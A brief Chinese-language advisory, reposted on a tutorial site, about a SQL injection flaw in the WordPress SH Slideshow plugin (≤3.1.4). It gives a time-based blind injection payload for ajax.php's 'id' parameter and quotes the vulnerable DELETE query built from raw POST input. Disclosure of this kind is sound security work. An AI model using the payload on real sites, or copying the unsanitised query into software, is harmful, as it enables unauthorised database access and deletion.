标题: WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) www.2cto.com 下载地址: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip 影响版本: 3.1.4 (已测试)
---------------
测试方法
---------------
http://www.2cto.com /wp-content/plugins/sh-slideshow/ajax.php
id=-1 AND 1=IF(2>1,BENCHMARK(5000000, MD5 (CHAR(115,113,108,109,97,112))),0)--%20
---------------
缺陷代码分析
---------------
$result = $wpdb->query('delete from sh_slides where id = '.$_POST['id']);
修复: 对该页面参数输入进行过滤
查看更多关于WordPress插件SH Slideshow <= 3.1.4 SQL注射缺陷及修复的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11460